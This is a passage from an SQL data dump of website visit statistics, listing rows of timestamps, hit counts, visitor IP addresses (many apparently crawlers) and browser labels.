0,'8.29.198.26','other'),(301676,1536659787,1,1,0,0,'54.36.148.187','other'),(301677,1536659947,1,1,0,0,'54.36.149.24','other'),(301678,1536660627,1,1,0,0,'54.36.149.15','other'),(301679,1536660672,2,2,0,0,'91.196.178.90','chrome'),(301680,1536660683,1,1,0,0,'54.36.148.184','other'),(301681,1536660731,1,1,0,0,'54.36.148.211','other'),(301682,1536660929,1,1,0,0,'54.36.149.98','other'),(301683,1536660960,1,1,0,0,'54.36.148.219','other'),(301684,1536660962,1,1,0,0,'54.36.149.89','other'),(301685,1536661184,1,1,0,0,'54.36.149.17','other'),(301686,1536661236,1,0,1,0,'66.249.66.73',''),(301687,1536661413,1,1,0,0,'54.36.149.75','other'),(301688,1536661537,1,1,0,0,'66.249.66.25','chrome'),(301689,1536661614,1,1,0,0,'54.36.148.120','other'),(301690,1536661750,1,1,0,0,'178.154.244.11','other'),(301691,1536661921,1,1,0,0,'66.249.66.74','chrome'),(301692,1536662052,1,1,0,0,'46.200.62.105','chrome'),(301693,1536662177,1,1,0,0,'54.36.148.108','other'),(301694,1536662527,1,1,0,0,'54.36.149.97','other'),(301695,1536662567,1,1,0,0,'66.249.66.73','chrome'),(301696,1536662685,4,4,0,0,'91.196.178.134','chrome'),(301697,1536663061,1,1,0,0,'94.179.38.245','firefox'),(301698,1536663073,1,1,0,0,'54.165.59.7','other'),(301699,1536663249,1,1,0,0,'54.36.148.23','other'),(301700,1536663300,1,1,0,0,'54.36.149.75','other'),(301701,1536663418,1,1,0,0,'54.36.148.200','other'),(301702,1536663970,1,1,0,0,'54.36.148.177','other'),(301703,1536663981,1,1,0,0,'8.29.198.27','other'),(301704,1536664124,1,1,0,0,'95.163.255.109','other'),(301705,1536664340,1,1,0,0,'31.184.238.113','firefox'),(301706,1536664539,1,1,0,0,'54.36.148.201','other'),(301707,1536664833,1,1,0,0,'54.36.148.50','other'),(301708,1536664964,1,1,0,0,'54.36.149.74','other'),(301709,1536664986,1,1,0,0,'162.210.196.98','other'),(301710,1536665761,1,1,0,0,'180.76.15.5','other'),(301711,1536665931,1,1,0,0,'178.154.244.29','other'),(301712,1536665935,1,1,0,0,'54.36.148.137','other'),(301713,1536666099,1,1,0,0,'91.196.177.134','chrome'),(301714,1536666229,1,1,0,0,'54.36.149.98','other'),(301715,1536666462,1,1,0,0,'66.249.66.27','chrome'),(301716,1536666484,1,1,0,0,'66.102.9.131','chrome'),(301717,1536666502,1,1,0,0,'35.187.132.40','chrome'),(301718,1536666504,1,1,0,0,'35.187.132.37','chrome'),(301719,1536666628,1,1,0,0,'54.36.148.39','other'),(301720,1536666742,1,1,0,0,'54.36.149.83','other'),(301721,1536666793,1,1,0,0,'54.36.148.76','other'),(301722,1536666903,1,1,0,0,'54.36.149.103','other'),(301723,1536666919,1,1,0,0,'54.36.149.1','other'),(301724,1536667005,1,1,0,0,'91.225.165.132','chrome'),(301725,1536667098,1,1,0,0,'54.36.148.237','other'),(301726,1536667402,1,1,0,0,'5.45.207.79','other'),(301727,1536667654,1,1,0,0,'54.36.149.28','other'),(301728,1536667732,2,2,0,0,'66.249.66.74','chrome'),(301729,1536667844,2,2,0,0,'66.249.66.73','chrome'),(301730,1536668110,2,2,0,0,'178.154.244.29','other'),(301731,1536668231,1,1,0,0,'54.36.148.198','other'),(301732,1536668624,1,1,0,0,'54.36.148.140','other'),(301733,1536668730,1,1,0,0,'54.36.149.3','other'),(301734,1536668875,1,1,0,0,'54.36.148.208','other'),(301735,1536669169,1,1,0,0,'54.36.148.135','other'),(301736,1536669295,1,1,0,0,'54.36.148.60','other'),(301737,1536669408,1,1,0,0,'54.36.149.42','other'),(301738,1536669544,1,1,0,0,'54.36.149.82','other'),(301739,1536669813,1,1,0,0,'54.36.148.218','other'),(301740,1536669829,1,1,0,0,'66.249.66.75','chrome'),(301741,1536670038,1,1,0,0,'54.36.149.91','other'),(301742,1536670241,1,1,0,0,'54.36.149.48','other'),(301743,1536670298,1,1,0,0,'54.36.148.15','other'),(301744,1536670362,1,1,0,0,'54.36.148.235','other'),(301745,1536670507,1,1,0,0,'216.244.66.241','other'),(301746,1536670530,1,1,0,0,'8.29.198.26','other'),(301747,1536670567,1,1,0,0,'54.36.148.110','other'),(301748,1536670578,1,1,0,0,'8.29.198.25','other'),(301749,1536670585,1,1,0,0,'54.36.148.142','other'),(301750,1536670677,1,1,0,0,'54.36.148.83','other'),(301751,1536670721,1,1,0,0,'54.36.148.62','other'),(301752,1536670775,1,1,0,0,'54.36.148.118','other'),(301753,1536670829,1,1,0,0,'82.207.49.98','firefox'),(301754,1536670836,1,1,0,0,'54.36.148.216','other'),(301755,1536671178,1,1,0,0,'54.36.148.185','other'),(301756,1536671183,1,1,0,0,'54.36.149.3','other'),(301757,1536671733,1,1,0,0,'54.36.148.121','other'),(301758,1536671775,1,1,0,0,'54.36.148.144','other'),(301759,1536671876,1,1,0,0,'54.36.148.155','other'),(301760,1536671907,1,1,0,0,'54.36.149.66','other'),(301761,1536672184,1,1,0,0,'54.36.148.145','other'),(301762,1536672589,1,1,0,0,'54.36.148.126','other'),(301763,1536672695,1,1,0,0,'54.36.149.10','other'),(301764,1536672761,1,1,0,0,'46.164.130.92','firefox'),(301765,1536672892,1,1,0,0,'54.36.149.60','other'),(301766,1536673007,1,1,0,0,'54.36.148.134','other'),(301767,1536673197,1,1,0,0,'54.36.148.111','other'),(301768,1536673290,2,2,0,0,'91.196.178.169','chrome'),(301769,1536673325,1,1,0,0,'54.36.148.45','other'),(301770,1536673476,1,1,0,0,'178.154.244.29','other'),(301771,1536673914,1,1,0,0,'80.240.128.221','chrome'),(301772,1536674261,1,1,0,0,'54.36.148.106','other'),(301773,1536674474,1,1,0,0,'54.36.148.198','other'),(301774,1536674586,1,1,0,0,'54.36.148.159','other'),(301775,1536674811,1,1,0,0,'8.29.198.26','other'),(301776,1536674890,1,1,0,0,'54.36.148.58','other'),(301777,1536675077,1,1,0,0,'54.36.149.22','other'),(301778,1536675235,1,1,0,0,'54.36.148.83','other'),(301779,1536675456,1,1,0,0,'54.36.149.68','other'),(301780,1536675482,1,1,0,0,'31.184.238.113','chrome'),(301781,1536675487,1,1,0,0,'54.36.148.125','other'),(301782,1536675667,1,1,0,0,'54.36.148.110','other'),(301783,1536675742,1,1,0,0,'54.36.148.25','other'),(301784,1536676050,1,1,0,0,'54.36.148.140','other'),(301785,1536676640,1,0,1,0,'66.249.66.74',''),(301786,1536676751,1,1,0,0,'54.36.149.60','other'),(301787,1536676915,1,1,0,0,'54.36.149.14','other'),(301788,1536676951,1,1,0,0,'54.36.149.69','other'),(301789,1536677029,1,1,0,0,'176.107.196.32','firefox'),(301790,1536677284,1,1,0,0,'54.36.148.10','other'),(301791,1536677449,1,1,0,0,'54.36.149.99','other'),(301792,1536677482,1,1,0,0,'54.36.148.165','other'),(301793,1536677489,1,1,0,0,'54.36.148.62','other'),(301794,1536677546,1,1,0,0,'54.36.148.46','other'),(301795,1536677855,1,1,0,0,'54.36.149.32','other'),(301796,1536677901,3,3,0,0,'216.244.66.241','other'),(301797,1536677947,1,1,0,0,'46.133.105.33','chrome'),(301798,1536678264,1,1,0,0,'54.36.148.126','other'),(301799,1536678654,1,1,0,0,'54.36.148.107','other'),(301800,1536678795,1,1,0,0,'54.36.148.148','other'),(301801,1536678949,1,1,0,0,'157.55.39.174','other'),(301802,1536679021,1,1,0,0,'163.172.4.153','chrome'),(301803,1536679363,1,1,0,0,'54.36.148.234','other'),(301804,1536679581,1,1,0,0,'188.230.43.254','other'),(301805,1536679702,1,1,0,0,'62.205.134.182','msie'),(301806,1536679946,1,1,0,0,'54.36.149.41','other'),(301807,1536680129,1,1,0,0,'54.36.148.78','other'),(301808,1536681093,1,1,0,0,'54.36.148.33','other'),(301809,1536681291,1,1,0,0,'54.36.148.63','other'),(301810,1536681361,1,1,0,0,'8.29.198.27','other'),(301811,1536681399,1,1,0,0,'8.29.198.25','other'),(301812,1536681986,1,1,0,0,'188.230.43.254','other'),(301813,1536682040,1,1,0,0,'54.36.148.150','other'),(301814,1536682069,1,0,1,0,'66.249.66.73',''),(301815,1536682425,1,1,0,0,'54.36.148.123','other'),(301816,1536682460,1,1,0,0,'54.36.148.155','other'),(301817,1536682515,1,1,0,0,'54.36.148.244','other'),(301818,1536682606,1,1,0,0,'54.36.148.184','other'),(301819,1536682780,1,1,0,0,'54.36.149.22','other'),(301820,1536683512,1,1,0,0,'66.249.66.73','chrome'),(301821,1536683713,1,1,0,0,'54.36.149.88','other'),(301822,1536683757,1,1,0,0,'54.36.149.36','other'),(301823,1536684199,1,1,0,0,'54.36.148.15','other'),(301824,1536684208,1,1,0,0,'54.36.149.13','other'),(301825,1536684517,1,1,0,0,'188.230.43.254','other'),(301826,1536684645,1,1,0,0,'54.36.148.184','other'),(301827,1536684913,1,1,0,0,'54.36.148.247','other'),(301828,1536684945,1,1,0,0,'54.36.148.203','other'),(301829,1536685064,1,1,0,0,'54.36.148.215','other'),(301830,1536685144,2,2,0,0,'178.154.244.29','other'),(301831,1536685254,1,1,0,0,'54.36.148.28','other'),(301832,1536685463,1,1,0,0,'54.36.149.48','other'),(301833,1536685556,1,1,0,0,'54.36.148.37','other'),(301834,1536685613,1,1,0,0,'91.196.178.75','firefox'),(301835,1536685615,1,1,0,0,'54.36.148.192','other'),(301836,1536685652,1,1,0,0,'8.29.198.25','other'),(301837,1536685987,1,1,0,0,'54.36.149.70','other'),(301838,1536686023,1,1,0,0,'216.244.66.241','other'),(301839,1536686187,1,1,0,0,'54.36.149.74','other'),(301840,1536686283,1,1,0,0,'54.36.148.67','other'),(301841,1536686310,1,1,0,0,'54.36.149.55','other'),(301842,1536686850,1,1,0,0,'54.36.148.174','other'),(301843,1536687434,1,1,0,0,'66.249.66.27','chrome'),(301844,1536687541,1,1,0,0,'54.36.148.254','other'),(301845,1536688044,1,1,0,0,'54.36.148.29','other'),(301846,1536688182,1,1,0,0,'54.36.148.199','other'),(301847,1536688321,1,1,0,0,'54.36.148.189','other'),(301848,1536688524,1,1,0,0,'54.36.149.4','other'),(301849,1536689095,2,2,0,0,'66.249.66.73','chrome'),(301850,1536689103,2,2,0,0,'66.249.66.75','chrome'),(301851,1536689110,2,1,1,0,'66.249.66.74',''),(301852,1536689262,1,1,0,0,'54.36.148.72','other'),(301853,1536689367,1,1,0,0,'54.36.148.25','other'),(301854,1536689397,1,1,0,0,'54.36.148.35','other'),(301855,1536689467,1,1,0,0,'54.36.148.65','other'),(301856,1536689728,1,1,0,0,'54.36.148.140','other'),(301857,1536689744,1,1,0,0,'54.36.148.221','other'),(301858,1536689896,1,1,0,0,'54.36.148.128','other'),(301859,1536690226,1,1,0,0,'54.36.149.79','other'),(301860,1536690475,1,1,0,0,'54.36.148.114','other'),(301861,1536690542,1,1,0,0,'54.36.148.88','other'),(301862,1536690618,1,0,1,0,'66.249.66.74',''),(301863,1536690767,1,1,0,0,'54.36.149.21','other'),(301864,1536690970,1,1,0,0,'54.36.148.155','other'),(301865,1536691434,1,1,0,0,'216.244.66.241','other'),(301866,1536691756,1,1,0,0,'54.36.149.11','other'),(301867,1536691899,1,1,0,0,'54.36.149.99','other'),(301868,1536691990,1,1,0,0,'178.92.72.211','chrome'),(301869,1536692031,1,1,0,0,'91.196.178.135','firefox'),(301870,1536692068,1,1,0,0,'92.61.155.10','chrome'),(301871,1536692201,1,1,0,0,'8.29.198.25','other'),(301872,1536692221,1,1,0,0,'8.29.198.26','other'),(301873,1536692316,1,1,0,0,'54.36.148.95','other'),(301874,1536692321,1,1,0,0,'54.36.148.110','other'),(301875,1536692374,1,1,0,0,'54.36.148.106','other'),(301876,1536692464,1,1,0,0,'54.36.149.84','other'),(301877,1536693424,1,1,0,0,'54.36.148.63','other'),(301878,1536693475,1,1,0,0,'91.196.178.165','chrome'),(301879,1536693647,1,1,0,0,'54.36.148.178','other'),(301880,1536693709,1,1,0,0,'107.167.103.154','other'),(301881,1536693757,1,1,0,0,'54.36.148.249','other'),(301882,1536693810,1,1,0,0,'54.36.149.57','other'),(301883,1536694443,1,1,0,0,'54.36.149.33','other'),(301884,1536694447,1,1,0,0,'178.154.244.29','other'),(301885,1536694844,1,1,0,0,'54.36.149.93','other'),(301886,1536694879,1,1,0,0,'54.36.148.142','other'),(301887,1536694931,1,1,0,0,'54.36.148.221','other'),(301888,1536695017,1,1,0,0,'54.36.149.47','other'),(301889,1536695027,1,1,0,0,'54.36.149.79','other'),(301890,1536695232,2,2,0,0,'54.36.148.122','other'),(301891,1536695262,1,1,0,0,'54.36.148.124','other'),(301892,1536695359,2,1,1,0,'66.249.66.74',''),(301893,1536695391,1,1,0,0,'54.36.148.67','other'),(301894,1536695508,1,1,0,0,'54.36.148.255','other'),(301895,1536695644,1,1,0,0,'54.36.149.105','other'),(301896,1536695802,1,1,0,0,'54.36.148.153','other'),(301897,1536696145,1,1,0,0,'54.36.148.139','other'),(301898,1536696478,1,1,0,0,'8.29.198.26','other'),(301899,1536696593,1,1,0,0,'66.249.66.26','chrome'),(301900,1536697723,1,1,0,0,'54.36.149.60','other'),(301901,1536697846,1,1,0,0,'54.36.148.47','other'),(301902,1536697908,1,0,1,0,'66.249.66.75',''),(301903,1536697938,1,1,0,0,'66.249.66.73','chrome'),(301904,1536698035,1,1,0,0,'54.36.148.144','other'),(301905,1536698383,2,2,0,0,'216.244.66.241','other'),(301906,1536698444,1,1,0,0,'54.36.148.215','other'),(301907,1536699148,1,1,0,0,'54.36.149.38','other'),(301908,1536699179,1,0,1,0,'66.249.66.73',''),(301909,1536699527,1,1,0,0,'54.36.149.21','other'),(301910,1536699605,1,1,0,0,'54.36.149.19','other'),(301911,1536699645,1,1,0,0,'54.36.148.131','other'),(301912,1536700333,1,1,0,0,'54.36.148.154','other'),(301913,1536700618,1,1,0,0,'54.36.149.1','other'),(301914,1536700778,1,1,0,0,'54.36.148.19','other'),(301915,1536700901,1,1,0,0,'54.36.148.93','other'),(301916,1536701337,1,1,0,0,'54.36.148.157','other'),(301917,1536701494,1,1,0,0,'54.36.149.54','other'),(301918,1536701574,1,1,0,0,'54.36.148.96','other'),(301919,1536701610,1,1,0,0,'54.36.149.49','other'),(301920,1536701631,1,1,0,0,'91.196.178.129','chrome'),(301921,1536701780,1,1,0,0,'66.249.66.74','chrome'),(301922,1536702003,1,1,0,0,'54.36.148.114','other'),(301923,1536702649,1,1,0,0,'54.36.149.54','other'),(301924,1536702653,1,1,0,0,'54.36.148.40','other'),(301925,1536703049,2,2,0,0,'8.29.198.27','other'),(301926,1536703050,1,1,0,0,'54.36.148.169','other'),(301927,1536703295,1,1,0,0,'54.36.148.238','other'),(301928,1536703404,1,1,0,0,'66.249.66.73','chrome'),(301929,1536703476,1,1,0,0,'54.36.148.82','other'),(301930,1536703521,1,1,0,0,'54.36.149.67','other'),(301931,1536703539,1,1,0,0,'54.36.149.12','other'),(301932,1536703606,1,1,0,0,'54.36.149.78','other'),(301933,1536703700,1,1,0,0,'54.36.148.53','other'),(301934,1536703966,1,1,0,0,'5.255.253.25','other'),(301935,1536704042,1,1,0,0,'54.36.148.187','other'),(301936,1536704091,1,1,0,0,'54.36.148.141','other'),(301937,1536704264,1,1,0,0,'54.36.148.158','other'),(301938,1536704358,1,1,0,0,'54.36.148.203','other'),(301939,1536704374,1,1,0,0,'54.36.149.81','other'),(301940,1536704975,1,0,1,0,'66.249.66.26',''),(301941,1536705129,1,1,0,0,'54.36.148.143','other'),(301942,1536705297,1,1,0,0,'51.255.65.46','other'),(301943,1536705475,1,1,0,0,'52.53.201.78','chrome'),(301944,1536705622,1,1,0,0,'54.36.148.80','other'),(301945,1536705719,1,1,0,0,'54.36.148.91','other'),(301946,1536705806,1,1,0,0,'54.36.149.8','other'),(301947,1536705812,1,1,0,0,'54.36.148.71','other'),(301948,1536706382,1,1,0,0,'54.36.148.54','other'),(301949,1536706400,1,1,0,0,'54.36.148.162','other'),(301950,1536706897,1,0,1,0,'66.249.66.73',''),(301951,1536707035,1,1,0,0,'94.45.190.36','chrome'),(301952,1536707091,1,1,0,0,'213.180.203.48','other'),(301953,1536707316,1,1,0,0,'8.29.198.25','other'),(301954,1536707612,1,1,0,0,'54.36.148.45','other'),(301955,1536707797,1,1,0,0,'54.36.148.189','other'),(301956,1536707864,1,1,0,0,'54.36.149.86','other'),(301957,1536707966,1,1,0,0,'54.36.148.141','other'),(301958,1536708300,1,1,0,0,'66.249.66.25','chrome'),(301959,1536708341,1,1,0,0,'54.36.149.61','other'),(301960,1536708654,1,0,1,0,'66.249.66.74',''),(301961,1536708744,1,1,0,0,'54.36.148.161','other'),(301962,1536709093,1,1,0,0,'54.36.148.128','other'),(301963,1536709260,1,1,0,0,'193.106.30.98','firefox'),(301964,1536710301,1,1,0,0,'54.36.149.93','other'),(301965,1536710498,1,1,0,0,'54.36.149.66','other'),(301966,1536710652,1,1,0,0,'54.36.148.152','other'),(301967,1536711262,1,1,0,0,'54.36.148.148','other'),(301968,1536711747,1,1,0,0,'54.36.148.42','other'),(301969,1536711908,1,1,0,0,'213.180.203.23','other'),(301970,1536711917,1,1,0,0,'5.45.207.76','other'),(301971,1536711918,1,1,0,0,'54.36.148.216','other'),(301972,1536712329,1,1,0,0,'54.36.148.82','other'),(301973,1536712520,1,1,0,0,'54.36.148.34','other'),(301974,1536712737,1,1,0,0,'54.36.148.164','other'),(301975,1536712823,1,1,0,0,'54.36.148.20','other'),(301976,1536713002,1,1,0,0,'66.249.66.73','chrome'),(301977,1536713170,1,1,0,0,'54.36.148.81','other'),(301978,1536713684,1,1,0,0,'185.191.204.7','chrome'),(301979,1536713721,1,1,0,0,'54.36.149.25','other'),(301980,1536713797,1,1,0,0,'54.36.148.53','other'),(301981,1536713878,1,1,0,0,'8.29.198.27','other'),(301982,1536713880,1,1,0,0,'8.29.198.25','other'),(301983,1536714127,1,1,0,0,'54.36.148.24','other'),(301984,1536714352,1,1,0,0,'54.36.149.107','other'),(301985,1536714659,1,1,0,0,'54.36.148.39','other'),(301986,1536714683,15,15,0,0,'188.40.102.170','other'),(301987,1536714732,1,1,0,0,'54.36.148.179','other'),(301988,1536714764,1,1,0,0,'54.36.148.236','other'),(301989,1536714806,1,0,1,0,'66.249.66.73',''),(301990,1536714926,1,0,1,0,'66.249.66.25',''),(301991,1536715032,1,1,0,0,'66.249.66.27','chrome'),(301992,1536715062,2,2,0,0,'5.9.144.234','other'),(301993,1536715065,1,1,0,0,'54.36.148.22','other'),(301994,1536715594,14,14,0,0,'188.40.102.170','other'),(301995,1536715598,1,1,0,0,'178.154.244.29','other'),(301996,1536715613,1,1,0,0,'54.36.148.54','other'),(301997,1536715673,1,1,0,0,'54.36.148.60','other'),(301998,1536715734,1,1,0,0,'54.36.148.196','other'),(301999,1536716057,1,1,0,0,'54.36.149.78','other'),(302000,1536716495,15,15,0,0,'188.40.102.170','other'),(302001,1536716535,1,1,0,0,'54.36.149.90','other'),(302002,1536716753,1,0,1,0,'66.249.66.75',''),(302003,1536716768,1,0,1,0,'66.249.66.73',''),(302004,1536716903,1,0,1,0,'66.249.66.26',''),(302005,1536716908,2,2,0,0,'216.244.66.241','other'),(302006,1536716921,1,1,0,0,'52.41.211.72','chrome'),(302007,1536716978,1,1,0,0,'54.36.148.19','other'),(302008,1536717406,14,14,0,0,'188.40.102.170','other'),(302009,1536717907,1,1,0,0,'207.46.13.4','other'),(302010,1536718141,1,1,0,0,'8.29.198.25','other'),(302011,1536718312,15,15,0,0,'188.40.102.170','other'),(302012,1536718362,1,1,0,0,'66.249.66.75','chrome'),(302013,1536718428,1,1,0,0,'54.36.148.192','other'),(302014,1536718465,1,1,0,0,'54.36.149.11','other'),(302015,1536718609,1,1,0,0,'54.36.148.252','other'),(302016,1536718706,1,1,0,0,'54.36.149.87','other'),(302017,1536718771,1,1,0,0,'54.36.148.212','other'),(302018,1536718945,1,1,0,0,'54.36.148.90','other'),(302019,1536719020,1,1,0,0,'54.36.148.134','other'),(302020,1536719187,1,1,0,0,'54.36.148.153','other'),(302021,1536719224,15,15,0,0,'188.40.102.170','other'),(302022,1536719255,1,1,0,0,'54.36.148.230','other'),(302023,1536719423,1,1,0,0,'54.36.148.118','other'),(302024,1536719765,1,1,0,0,'54.36.148.144','other'),(302025,1536719933,1,1,0,0,'54.36.148.189','other'),(302026,1536720072,1,1,0,0,'54.36.149.63','other'),(302027,1536720125,4,4,0,0,'188.40.102.170','other'),(302028,1536720498,1,1,0,0,'54.36.148.209','other'),(302029,1536721380,1,1,0,0,'180.76.15.137','other'),(302030,1536721603,1,1,0,0,'178.154.244.11','other'),(302031,1536721605,1,1,0,0,'35.162.141.144','chrome'),(302032,1536721659,1,1,0,0,'54.36.148.214','other'),(302033,1536721914,1,1,0,0,'54.36.148.118','other'),(302034,1536722167,1,0,1,0,'66.249.66.73',''),(302035,1536722743,1,1,0,0,'54.36.148.125','other'),(302036,1536722767,1,1,0,0,'54.36.148.35','other'),(302037,1536722973,1,1,0,0,'54.36.148.159','other'),(302038,1536723003,1,1,0,0,'54.36.148.228','other'),(302039,1536723106,1,1,0,0,'66.249.66.74','chrome'),(302040,1536723259,1,1,0,0,'54.36.149.47','other'),(302041,1536723287,1,1,0,0,'66.249.66.27','chrome'),(302042,1536723391,1,1,0,0,'54.36.148.74','other'),(302043,1536723633,1,1,0,0,'54.36.148.249','other'),(302044,1536723969,1,1,0,0,'91.209.11.236','other'),(302045,1536723975,1,1,0,0,'157.55.39.174','other'),(302046,1536724411,1,1,0,0,'54.36.148.127','other'),(302047,1536724580,1,1,0,0,'216.244.66.241','other'),(302048,1536724624,1,1,0,0,'54.36.148.244','other'),(302049,1536724703,1,1,0,0,'8.29.198.25','other'),(302050,1536724713,1,1,0,0,'8.29.198.27','other'),(302051,1536724759,1,1,0,0,'54.36.148.108','other'),(302052,1536724910,1,1,0,0,'54.36.149.16','other'),(302053,1536725339,1,1,0,0,'66.249.66.75','chrome'),(302054,1536725570,1,1,0,0,'54.36.148.58','other'),(302055,1536725670,1,0,1,0,'66.249.66.74',''),(302056,1536725705,1,1,0,0,'54.36.148.160','other'),(302057,1536725760,1,1,0,0,'54.36.149.77','other'),(302059,1536725906,1,1,0,0,'54.36.148.89','other'),(302060,1536726088,1,1,0,0,'54.36.148.219','other'),(302061,1536726190,1,1,0,0,'54.36.148.253','other'),(302062,1536726421,1,1,0,0,'5.255.253.25','other'),(302063,1536726567,1,1,0,0,'54.36.148.90','other'),(302064,1536726608,1,1,0,0,'54.36.148.71','other'),(302065,1536727228,1,1,0,0,'54.36.148.142','other'),(302066,1536727235,1,1,0,0,'54.36.148.59','other'),(302067,1536727419,1,1,0,0,'54.36.149.89','other'),(302068,1536727657,1,0,1,0,'66.249.66.73',''),(302069,1536727752,1,1,0,0,'66.249.66.74','chrome'),(302070,1536727912,1,1,0,0,'54.36.148.82','other'),(302071,1536727997,1,1,0,0,'54.36.149.14','other'),(302072,1536728102,1,1,0,0,'54.36.148.145','other'),(302073,1536728304,1,1,0,0,'178.154.244.11','other'),(302074,1536728636,1,1,0,0,'54.36.148.159','other'),(302075,1536728968,1,1,0,0,'54.36.148.38','other'),(302076,1536728974,1,1,0,0,'8.29.198.26','other'),(302077,1536728981,1,1,0,0,'54.36.148.52','other'),(302078,1536729145,1,1,0,0,'91.196.178.90','chrome'),(302079,1536729294,1,1,0,0,'54.36.148.94','other'),(302080,1536729566,1,1,0,0,'54.36.148.139','other'),(302081,1536729876,1,1,0,0,'95.163.255.92','other'),(302082,1536730914,1,0,1,0,'66.249.66.25',''),(302083,1536730981,1,0,1,0,'66.249.66.74',''),(302084,1536731297,1,1,0,0,'157.55.39.174','other'),(302085,1536731330,1,1,0,0,'54.36.148.34','other'),(302086,1536731369,1,1,0,0,'54.36.148.242','other'),(302087,1536731650,1,1,0,0,'54.36.148.13','other'),(302088,1536732108,1,1,0,0,'54.36.149.24','other'),(302089,1536732745,1,1,0,0,'54.36.148.30','other'),(302090,1536732881,1,1,0,0,'54.36.148.63','other'),(302091,1536733082,1,1,0,0,'54.36.149.19','other'),(302092,1536733229,1,1,0,0,'66.249.66.73','chrome'),(302093,1536733521,1,1,0,0,'54.36.148.245','other'),(302094,1536733729,1,1,0,0,'141.8.142.103','other'),(302095,1536733730,1,1,0,0,'95.108.213.4','other'),(302096,1536733985,1,1,0,0,'54.36.148.221','other'),(302097,1536734184,2,2,0,0,'91.196.178.89','chrome'),(302098,1536734213,1,0,1,0,'66.249.66.75',''),(302099,1536734513,1,1,0,0,'54.36.148.165','other'),(302100,1536734946,1,1,0,0,'54.36.149.67','other'),(302101,1536735228,1,1,0,0,'5.255.253.22','other'),(302102,1536735526,1,1,0,0,'8.29.198.25','other'),(302103,1536735540,1,1,0,0,'54.36.148.22','other'),(302104,1536735543,1,1,0,0,'8.29.198.27','other'),(302105,1536735668,1,1,0,0,'216.244.66.241','other'),(302106,1536735763,1,1,0,0,'66.249.66.74','chrome'),(302107,1536736049,1,1,0,0,'54.36.148.181','other'),(302108,1536736176,1,1,0,0,'66.249.66.25','chrome'),(302109,1536736456,1,1,0,0,'54.36.149.104','other'),(302110,1536736635,1,1,0,0,'54.36.148.132','other'),(302111,1536736790,1,1,0,0,'91.196.178.89','chrome'),(302112,1536737816,1,1,0,0,'54.36.148.231','other'),(302113,1536738148,1,1,0,0,'54.36.148.235','other'),(302114,1536738409,1,1,0,0,'66.249.66.75','chrome'),(302115,1536738808,1,1,0,0,'54.36.149.90','other'),(302116,1536738945,1,1,0,0,'91.196.178.89','chrome'),(302117,1536739153,1,1,0,0,'62.205.134.182','msie'),(302118,1536739274,1,1,0,0,'54.36.148.55','other'),(302119,1536739320,1,1,0,0,'54.36.148.53','other'),(302120,1536739405,2,2,0,0,'91.196.178.136','chrome'),(302121,1536739471,1,1,0,0,'54.36.148.148','other'),(302122,1536739655,1,1,0,0,'54.36.148.144','other'),(302123,1536739802,1,1,0,0,'8.29.198.26','other'),(302124,1536739830,1,1,0,0,'66.249.66.74','chrome'),(302125,1536739922,1,1,0,0,'94.179.147.98','chrome'),(302126,1536739965,1,1,0,0,'54.36.149.83','other'),(302127,1536740036,1,1,0,0,'91.209.11.236','other'),(302128,1536740325,1,1,0,0,'54.36.148.177','other'),(302129,1536740420,1,1,0,0,'62.205.134.182','msie'),(302130,1536740632,1,1,0,0,'54.36.148.110','other'),(302131,1536741040,1,1,0,0,'95.132.49.204','firefox'),(302132,1536741235,1,1,0,0,'54.36.148.218','other'),(302133,1536741253,1,1,0,0,'54.36.148.155','other'),(302134,1536741400,1,1,0,0,'5.188.210.52','firefox'),(302135,1536741498,1,1,0,0,'54.36.148.215','other'),(302136,1536741635,1,1,0,0,'178.154.244.29','other'),(302137,1536741783,1,1,0,0,'162.210.196.98','other'),(302138,1536741938,1,1,0,0,'54.36.149.20','other'),(302139,1536742076,1,1,0,0,'178.154.244.11','other'),(302140,1536742202,2,2,0,0,'66.249.66.73','chrome'),(302141,1536742293,1,1,0,0,'66.249.66.75','chrome'),(302142,1536742370,1,1,0,0,'5.45.207.19','other'),(302143,1536742584,1,1,0,0,'54.36.148.119','other'),(302144,1536742842,1,1,0,0,'54.36.148.205','other'),(302145,1536742927,3,3,0,0,'216.244.66.241','other'),(302146,1536743922,1,1,0,0,'54.36.149.84','other'),(302147,1536743934,1,1,0,0,'54.36.148.238','other'),(302148,1536744156,1,1,0,0,'54.36.149.6','other'),(302149,1536744316,1,1,0,0,'54.36.149.51','other'),(302150,1536744651,1,1,0,0,'54.36.148.129','other'),(302151,1536744938,1,1,0,0,'54.36.149.79','other'),(302152,1536745018,1,1,0,0,'54.36.148.104','other'),(302153,1536745147,1,1,0,0,'54.36.148.98','other'),(302154,1536745348,1,1,0,0,'54.36.148.244','other'),(302155,1536746350,1,1,0,0,'8.29.198.26','other'),(302156,1536746373,1,1,0,0,'8.29.198.27','other'),(302157,1536746587,1,1,0,0,'54.36.148.199','other'),(302158,1536746843,1,1,0,0,'54.36.148.48','other'),(302159,1536746902,1,1,0,0,'54.36.148.145','other'),(302160,1536746991,1,1,0,0,'54.36.148.197','other'),(302161,1536747171,1,1,0,0,'54.36.148.134','other'),(302162,1536747218,1,1,0,0,'54.36.149.36','other'),(302163,1536747290,1,1,0,0,'54.36.149.26','other'),(302164,1536747304,1,0,1,0,'66.249.66.26',''),(302165,1536747722,1,1,0,0,'54.36.148.237','other'),(302166,1536747838,1,1,0,0,'54.36.149.52','other'),(302167,1536747963,1,1,0,0,'95.163.255.114','other'),(302168,1536747967,1,1,0,0,'95.163.255.119','other'),(302169,1536747975,1,1,0,0,'95.163.255.109','other'),(302170,1536749488,1,1,0,0,'178.92.139.88','chrome'),(302171,1536749811,1,0,1,0,'66.249.66.73',''),(302172,1536750624,1,1,0,0,'8.29.198.25','other'),(302173,1536750831,1,1,0,0,'91.196.178.134','firefox'),(302174,1536751292,1,1,0,0,'91.196.178.162','chrome'),(302175,1536751637,1,1,0,0,'77.81.107.129','firefox'),(302176,1536751648,1,1,0,0,'37.73.26.87','chrome'),(302177,1536751653,1,1,0,0,'46.201.125.163','chrome'),(302178,1536751688,1,1,0,0,'178.154.244.29','other'),(302179,1536752010,2,2,0,0,'91.209.11.236','other'),(302180,1536752023,2,2,0,0,'46.211.98.209','chrome'),(302181,1536752319,1,1,0,0,'193.106.30.98','firefox'),(302182,1536752378,1,1,0,0,'207.46.13.4','other'),(302183,1536752450,1,1,0,0,'95.163.255.115','other'),(302184,1536753253,1,1,0,0,'77.93.44.22','chrome'),(302185,1536753356,1,1,0,0,'66.249.66.74','chrome'),(302186,1536753378,1,1,0,0,'216.244.66.241','other'),(302187,1536753402,1,1,0,0,'40.77.167.134','other'),(302188,1536753783,2,2,0,0,'77.88.202.203','chrome'),(